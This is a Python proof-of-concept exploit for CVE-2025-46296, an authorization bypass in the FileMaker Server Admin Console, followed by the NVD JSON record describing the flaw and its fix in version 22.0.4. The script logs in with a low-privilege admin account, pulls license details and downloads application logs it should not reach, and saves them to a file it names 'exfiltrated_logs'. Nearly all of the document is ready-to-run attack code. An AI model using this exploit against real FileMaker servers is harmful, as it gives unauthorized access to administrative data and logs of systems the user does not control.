CVE-2025-46296

# CVE-2025-46296 PoC - FileMaker Server Admin Console Authorization Bypass # This PoC demonstrates accessing restricted admin functions with low-privilege account import requests import json TARGET_URL = "https://target-server:16000" USERNAME = "low_privilege_admin" PASSWORD = "password" def exploit_auth_bypass(): """Exploit authorization bypass in FileMaker Server Admin Console""" # Step 1: Authenticate with low-privilege account session = requests.Session() login_url = f"{TARGET_URL}/fmi/admin/login" login_data = { "username": USERNAME, "password": PASSWORD } response = session.post(login_url, data=login_data, verify=False) if response.status_code != 200: print("[-] Login failed") return print("[+] Successfully authenticated with low-privilege account") # Step 2: Access license details (requires higher privileges) license_url = f"{TARGET_URL}/fmi/admin/api/v1/license" license_response = session.get(license_url) if license_response.status_code == 200: print("[+] Authorization bypass successful - Retrieved license details") print(license_response.text) else: print(f"[-] Failed to access license details: {license_response.status_code}") # Step 3: Download application logs (requires higher privileges) logs_url = f"{TARGET_URL}/fmi/admin/api/v1/logs/download" logs_response = session.get(logs_url) if logs_response.status_code == 200: print("[+] Authorization bypass successful - Downloaded application logs") with open("exfiltrated_logs.txt", "w") as f: f.write(logs_response.text) print("[+] Logs saved to exfiltrated_logs.txt") else: print(f"[-] Failed to download logs: {logs_response.status_code}") if __name__ == "__main__": exploit_auth_bypass()

{"cve": {"id": "CVE-2025-46296", "sourceIdentifier": "[email protected]", "published": "2025-12-16T18:16:12.580", "lastModified": "2025-12-23T14:45:08.873", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authorization bypass vulnerability in FileMaker Server Admin Console allowed administrator roles with minimal privileges to access administrative features such as viewing license details and downloading application logs. This vulnerability has been fully addressed in FileMaker Server 22.0.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:claris:filemaker_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "22.0.4", "matchCriteriaId": "72210F6C-78D0-449C-BD0A-A175305D1F3B"}]}]}], "references": [{"url": "https://support.claris.com/s/answerview?anum=000049056&language=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}